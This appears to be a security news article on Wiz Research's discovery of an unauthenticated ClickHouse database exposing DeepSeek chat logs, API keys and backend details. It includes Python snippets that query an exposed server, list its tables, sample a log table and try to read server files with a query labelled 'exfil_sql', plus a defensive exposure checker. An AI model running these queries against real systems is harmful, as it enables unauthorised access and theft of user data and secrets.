A publicly accessible database belonging to DeepSeek, a fast-rising Chinese AI startup, was found exposed to the internet without any authentication, allowing full control over database operations, including access to highly sensitive internal data.
The exposure, identified by Wiz Research, included more than a million lines of log streams containing chat histories, secret keys, backend details, and other critical information.
The Wiz Research team responsibly disclosed the issue to DeepSeek, which promptly secured the database.
However, this incident underscores the growing risks associated with rapidly adopting AI technologies without robust security measures.
The Discovery: A ClickHouse Database Without Authentication
DeepSeek has gained significant attention for its innovative AI models, particularly the DeepSeek-R1 reasoning model, which rivals industry leaders like OpenAI in performance and efficiency.
As part of their routine security assessments, Wiz Research analyzed DeepSeek’s external security posture and uncovered a serious vulnerability within minutes.
The team found a publicly accessible ClickHouse database hosted at two subdomains, oauth2callback.deepseek.com and dev.deepseek.com, listening on open ports 8123 and 9000.
The database was completely unauthenticated, allowing anyone to run arbitrary SQL queries directly from a browser via ClickHouse's HTTP interface.
This raised immediate concerns due to the sensitive nature of the data stored within.
ClickHouse is an open-source database system designed for handling large-scale data analytics.
Its capabilities make it a valuable tool for real-time data processing but also a high-value target if exposed without proper security controls.
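To illustrate how low the bar was, here is a minimal sketch of the kind of request involved, using a hypothetical hostname. ClickHouse's HTTP interface accepts SQL in a simple query parameter, so an unauthenticated server will answer a request like this from any browser or script:

```python
import requests

# Port 8123 is ClickHouse's default HTTP interface; the hostname is a
# hypothetical stand-in for an exposed server.
CLICKHOUSE_URL = "http://clickhouse-exposed.example.com:8123"

# With no authentication configured, a plain GET request carrying a
# "query" parameter is enough to run SQL against the server.
resp = requests.get(CLICKHOUSE_URL, params={"query": "SHOW DATABASES"})
print(resp.text)
```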

After enumerating the database's tables with simple queries, Wiz Research found a “log_stream” table holding logs dating back to January 6, 2025.
These logs contained plaintext chat histories, API keys, backend operational metadata, and references to internal API endpoints, all of which could be exploited by malicious actors.
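A hedged reconstruction of that enumeration step, again against a hypothetical host, might look like the following: list the tables first, then sample the log table.

```python
import requests

CLICKHOUSE_URL = "http://clickhouse-exposed.example.com:8123"  # hypothetical host

def run_query(sql: str) -> str:
    """Send a read-only SQL statement to the open HTTP interface."""
    resp = requests.get(CLICKHOUSE_URL, params={"query": sql})
    resp.raise_for_status()
    return resp.text

# Step 1: list the tables visible to the anonymous default user.
print(run_query("SHOW TABLES"))

# Step 2: sample rows from the log table surfaced by the enumeration.
print(run_query("SELECT * FROM log_stream LIMIT 10"))
```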
Implications for AI Security
The exposure at DeepSeek highlights a broader issue within the rapidly expanding AI industry: inadequate security practices surrounding critical infrastructure.
While much attention is given to futuristic AI threats like model manipulation or adversarial attacks, this incident demonstrates that basic security oversights—such as leaving databases exposed—pose an equally significant risk.
Key risks identified in this case include:
- Data Exfiltration: Attackers could have accessed sensitive logs and plaintext chat messages, or even exfiltrated proprietary files using SQL commands (a hedged sketch follows this list).
- Privilege Escalation: The lack of authentication allowed potential attackers to gain full control over the database environment.
- User Data Exposure: End-user information stored in chat histories and API logs was left vulnerable to exploitation.
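To make the exfiltration risk concrete: ClickHouse exposes a file() table function that, depending on the server's configuration and the querying user's grants, can read files from the server's filesystem. The sketch below is illustrative only; the hostname and file name are invented, and success is not guaranteed on any given deployment.

```python
import requests

CLICKHOUSE_URL = "http://clickhouse-exposed.example.com:8123"  # hypothetical host

# ClickHouse's file() table function reads files from the server's
# configured user-files directory. Whether it succeeds depends on the
# server's settings and the user's grants, so treat this as a sketch of
# the attack class rather than a guaranteed result; the file name is
# invented for illustration.
exfil_sql = "SELECT * FROM file('exported_data.csv', 'CSVWithNames')"
resp = requests.get(CLICKHOUSE_URL, params={"query": exfil_sql})
print(resp.status_code, resp.text[:500])
```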
As organizations increasingly adopt AI-driven services, they often entrust startups like DeepSeek with sensitive data.
However, the speed of adoption frequently outpaces the implementation of robust security measures.
This creates vulnerabilities that can have far-reaching consequences for both businesses and their customers.
A Call for Stronger Security Measures
The DeepSeek incident serves as a wake-up call for the AI industry to prioritize security alongside innovation.
Startups and established companies alike must implement rigorous defenses against basic vulnerabilities such as external database exposure.
Security teams should work closely with AI engineers to gain visibility into the full architecture and tooling, and should adopt best practices for safeguarding sensitive data.
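As one concrete, low-effort practice, here is a sketch of an external check a security team might run against its own hosts, using illustrative hostnames and assuming the standard ClickHouse HTTP port:

```python
import requests

def clickhouse_is_open(host: str, port: int = 8123, timeout: float = 3.0) -> bool:
    """Return True if a host answers a ClickHouse query with no credentials."""
    try:
        resp = requests.get(
            f"http://{host}:{port}",
            params={"query": "SELECT 1"},
            timeout=timeout,
        )
    except requests.RequestException:
        return False  # closed, filtered, or not speaking HTTP
    # An open, unauthenticated ClickHouse server answers "1"; a locked-down
    # one returns an authentication error instead.
    return resp.ok and resp.text.strip() == "1"

# Illustrative hostnames; point this at your own external attack surface.
for host in ["dev.example.com", "oauth2callback.example.com"]:
    print(host, "EXPOSED" if clickhouse_is_open(host) else "ok")
```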
As AI continues its unprecedented integration into global business operations, the industry must recognize that its role as critical infrastructure comes with heightened responsibilities.
By addressing these foundational risks now, companies can build trust and resilience in an increasingly interconnected world reliant on artificial intelligence.